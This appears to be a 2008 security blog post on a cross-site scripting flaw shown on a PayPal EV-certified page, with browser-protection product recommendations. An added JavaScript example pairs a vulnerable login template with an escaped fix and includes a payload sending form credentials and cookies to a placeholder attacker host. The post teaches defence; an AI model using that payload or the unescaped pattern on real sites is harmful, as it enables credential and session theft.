PayPal Alert!


A Finnish security researcher has shown how to mess with a supposedly 'secure' PayPal web page while the address bar still leads visitors to believe they're safe.

Are you aware of the security indicators many web sites use to [help] tell users (via their browser) that the connection is 'encrypted', and that the site has been 'verified/validated'* by one of the [many] certificate authorities (like VeriSign**)? If you are, that's good. You're ahead of the folks who pay no attention at all, and it shows that you're making an effort to keep security in mind. Unfortunately, that's not nearly good enough: those indicators tell you who you're talking to and that nobody can read the traffic in transit, not that the page itself is free of bugs.

Do you think that you're "safe" when you see your address bar turn green indicating that the site is using the EV 'Extended Validation' SSL Certificate security mechanism? Read this article about how "...Finnish researcher Harry Sintonen figured out a way to inject his own code into a supposedly protected PayPal page even as the green bar lulled visitors into believing it hadn't been tampered with. Sintonen's code simply caused an Internet Explorer alert window to open with the words "Is it safe?...".

Below a screenshot showing what Sintonen did, the author explains it like this: "During an online interview, he demonstrated a page that prompted users for their account credentials and then sent them to an unauthorized server, and he said it would be possible for him to steal user cookies as well. All the while, the address bar would bear the PayPal URL in green. At time of publication, eBay had not yet removed the buggy code." In other words, the page really was served by PayPal over HTTPS with a valid EV certificate; the problem was that PayPal's own page could be made to carry an attacker's script.

Further down the author [rightly] points out another 'indicator' that gives web site visitors a false sense of security: "Despite the proliferation of XSS attacks, McAfee's ScanAlert, which provides daily audits of ecommerce websites to certify them "Hacker Safe," gives clients the thumbs up even when XSS vulnerabilities are discovered on their pages. ®".
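To make the point concrete, here is an added example (mine, not code from the article and not Sintonen's actual injection) of the bug class behind the story: an HTTPS page that copies a request parameter into its HTML without escaping it. The login form, the `return_url` parameter and the `attacker.example` host are all made-up placeholders. The escaped version is the real fix; a certificate, green bar or not, never was going to catch this, and a script blocker only helps if it doesn't already trust the site or filters the injected request.

```javascript
// Added example, not from the article and not Sintonen's actual injection.
// It models the bug class behind the story: an HTTPS page that copies a
// request parameter into its HTML without escaping. TLS and the EV certificate
// authenticate the server and encrypt the connection; they say nothing about
// whether the HTML the server built was shaped by an attacker-supplied value.

// Hypothetical login template (constructed; not PayPal's real page).
// The attacker controls `returnUrl`, which arrives in the query string.
function renderLoginUnsafe(returnUrl) {
  return [
    '<form action="/login" method="post">',
    `  <input type="hidden" name="return_url" value="${returnUrl}">`,
    '  <input name="user"> <input name="pass" type="password">',
    '</form>',
  ].join('\n');
}

// Escape the five HTML metacharacters so the value is inert in both text and
// double-quoted attribute contexts. This is the actual fix for the bug.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Same template, but the untrusted value is escaped before it is inserted.
function renderLoginSafe(returnUrl) {
  return [
    '<form action="/login" method="post">',
    `  <input type="hidden" name="return_url" value="${escapeHtml(returnUrl)}">`,
    '  <input name="user"> <input name="pass" type="password">',
    '</form>',
  ].join('\n');
}

// Constructed payloads. The first reproduces the harmless "Is it safe?" proof;
// the second shows why the credential theft described above works: it re-points
// the login form at an attacker host (attacker.example is a placeholder) and
// leaks document.cookie, all while the address bar still shows the real
// https://www.paypal.com URL with the EV indicator, because the page really
// did come from PayPal's server.
const PROOF_PAYLOAD = '"><script>alert("Is it safe?")</script><input value="';
const STEAL_PAYLOAD =
  '"><script>' +
  'document.forms[0].action="https://attacker.example/collect";' +
  'new Image().src="https://attacker.example/c?"+encodeURIComponent(document.cookie);' +
  '</script><input value="';

// Crude check used to compare the two renderers: the template contains no
// <script> element, so any one in the output was injected. (A real scanner
// needs an HTML parser; this is enough to show the difference.)
function containsInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// Demo when run directly with Node: prints both renderings of the theft payload.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('--- unsafe render ---\n' + renderLoginUnsafe(STEAL_PAYLOAD));
  console.log('--- safe render ---\n' + renderLoginSafe(STEAL_PAYLOAD));
}
```

Run it with Node and compare the two outputs: in the unsafe rendering the `return_url` attribute is closed early and a live `<script>` element follows it, while in the safe rendering the same bytes arrive as `&quot;&gt;&lt;script&gt;...` and stay inside the attribute as inert text.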


I have to say that if you have been reading my posts, and followed my advice urging you to use the Firefox browser combined with the "NoScript" add-on, you'd be protected against this and many other scripting and XSS (cross-site scripting) attacks, and more.

I can't tell you how often I've read about some new exploit being discovered and realized that it doesn't affect me thanks to NoScript. I don't care if I sound like a salesman for Firefox and NoScript. First of all, they're FREE, and second, they're what I personally use (90% of the time***) because I believe the combination provides an excellent foundation for safe browsing. Also, Giorgio Maone is brilliant and stays on top of the latest threats, updating NoScript regularly. One of the top security organizations in the world (SANS) has mentioned NoScript numerous times, including here.

In addition to those two, other required elements for web-surfing security (that I've mentioned many times) are 'real-time' scanners that examine the content/actions of a web page and/or search results (and not just attempt to match 'signatures' of known malware), preventing your browser from accessing them if anything malicious is detected. So far I believe LinkScanner Pro is the best product in this category because it goes beyond protecting your web browsing sessions; it also protects your system/network full-time. It's not free, but it's not expensive either (about twenty bucks), and it's one of the [very] few pieces of software I'd gladly pay for! There's also a free 'Lite' version available that doesn't have the full system protection but still offers protection while you browse. I really like the ability to right-click on any link and have LinkScanner check it with "Quick Scan" before I left-click on it for real.

Here are some clips from this Exploit Prevention Labs page explaining some of the important differences between LinkScanner (and, to some extent, Finjan's SecureBrowsing) and McAfee's "SiteAdvisor":

"LinkScanner and SiteAdvisor are both intended to provide information about website safety. However, that is where the comparison ends. We believe that SiteAdvisor, while clearly a quality product, was conceived in the relatively static world of Web 1.0, a very different place from the highly dynamic Web 2.0 for which LinkScanner has been designed."

"LinkScanner’s SearchShield technology actually does a live scan on Google, Yahoo and MSN search results and with no delay in search engine results delivery. This enables LinkScanner to definitively state whether the page behind any link is or is not safe at the only time that matters – the time you plan to visit it. Similarly, LinkScanner’s QuickScan technology scans any link on-demand with a simple right mouse-click.

In contrast, SiteAdvisor "crawls" entire sites over a period of weeks and/or months and renders opinions about entire sites, which are then stored in a central database. When you perform a search, SiteAdvisor simply reaches back to its database and delivers an opinion based on the status of the site the last time it was crawled. Because the Internet is so large and crawling is time-intensive, it might be many months before SiteAdvisor revisits a site to check its safety. It may also take weeks or even months for SiteAdvisor to scan the entire site before it can offer an opinion on its safety – assuming it has ever visited the site at all. A delay of any length of time in today's Web 2.0 world can easily mean the difference between a clean bill of health and an infection for that site you’re about to click through to."

- I used McAfee's SiteAdvisor (and also Netcraft) before I discovered Finjan and subsequently LinkScanner/Pro. Many times SiteAdvisor told me a site had either not been scanned yet, identified some of my favorite sites as 'questionable', or was 'in the process of checking' out the site. It just got to the point where I couldn't trust the results.

"With LinkScanner, if you click on a link that goes to a bad page, we look ahead at that page and, if it's safe, you can continue your surfing without delay. If it is bad when you’re about to click on it, we block access to that page to prevent it from infecting your system. We do this page by page, not site by site or domain by domain.

When SiteAdvisor renders an opinion, it is an opinion on the entire site, not just the page you are visiting. Why is this important? A few weeks ago, an exploit infected thousands of MySpace.com pages in a matter of hours. SiteAdvisor would (if they had scanned any of those thousands of pages that day) have had to make a decision to either label ALL of MySpace.com bad because of those bad pages, blocking you from visiting any of the thousands of safe pages on that domain, or label all of MySpace.com safe, putting you at risk if you visited any of the bad pages."

- Common sense dictates which of these products provides the better protection. No product can protect you 100% of the time from everything. All you can do is go with the best product(s) you can find, don't rely on one [single] product to do everything, and be as smart as you can.

There's also Finjan's SecureBrowsing add-on. Finjan is an excellent company as well; they mainly sell security 'hardware' (appliances) for businesses. I believe SecureBrowsing and LinkScanner work with both Firefox and Internet Explorer (although I have to advise people to limit their use of IE to 'only when necessary').


There are also other methods of protection for browsers, like 'sandboxing'. One of the best known products is Sandboxie. Another is (or was) GreenBorder Technologies, which was acquired by Google. More recently, "ZoneAlarm ForceField" from Check Point Software Technologies was released in 'beta' form and is now finished and available.

It's interesting that ZoneAlarm ForceField promotional material almost makes it sound like they just invented sandbox technology, when it's actually been around and used for quite a long time.

ZoneAlarm ForceField is not free. Sandboxie can be used without paying, but "if you use Sandboxie for more than 30 days, the software will occasionally remind you to consider paying the registration fee." If purchased/registered, they'll both run you about $30, although Sandboxie gives you "...a life-time registration key to this and all upcoming versions... You also get to use a few of the features of Sandboxie that are reserved for paying users."

Note: I haven't used either (yet), so I can't advise you as to their effectiveness. I plan to keep an eye on the new ZoneAlarm product and see what kind of reviews it gets, and at some point give it a try myself.

And one last thought I wanted to mention. Many of the firewalls, anti-virus/malware products, and combination 'suites' incorporate various web protection technologies as well. Their effectiveness and abilities vary, so you should rely on independent testing and real-world results (and the anecdotal evidence that generates in the relevant user forums).

As with most things, the more you know, the better you'll be able to judge what works best for you. Certain security products work well together, others don't. Over time you should find what works best for you and your system. But don't be afraid to try out new software, and give it a chance!

But if you run into issues, make certain that they're not being caused by quirks in your system or something you've done (or failed to do, like reading the instructions/help section). I see it frequently in forums and software comment sections where someone will say how terrible a product is, all the while I know from my own experience that the product is fine and it's the user and/or their system that's screwed up!

And keep in mind that no product is perfect. That's why knowledgeable people suggest and use a 'layered' defense, so that what one can't (or isn't designed to) catch, another should. It's an ongoing process of software/hardware evolution, both for the criminal hackers/crackers and for their counterparts working to protect end users.


- Until next time, remember that one of the most important security tools you have is your brain, so always remember to THINK before you click!


* Almost anyone can get an SSL certificate for their web site; at the basic level it only takes paying the fee, and the certificate says nothing about the quality of the code running behind it.

** VeriSign is one of the reputable companies, but there are many others without VeriSign's reputation. And as you see, even when a web site is totally legitimate and has been 'certified', and even if it's using an SSL (https://) connection for the page (or the whole site) with an 'extended validation' certificate, it's STILL vulnerable to hacking/exploits! The certificate vouches for who runs the site and encrypts the traffic; it does nothing about bugs in the site's own pages.

*** I have to use IE at times, and I also like the Opera browser and its innovative features. If NoScript worked with Opera I'd probably use it a lot more.

September 2008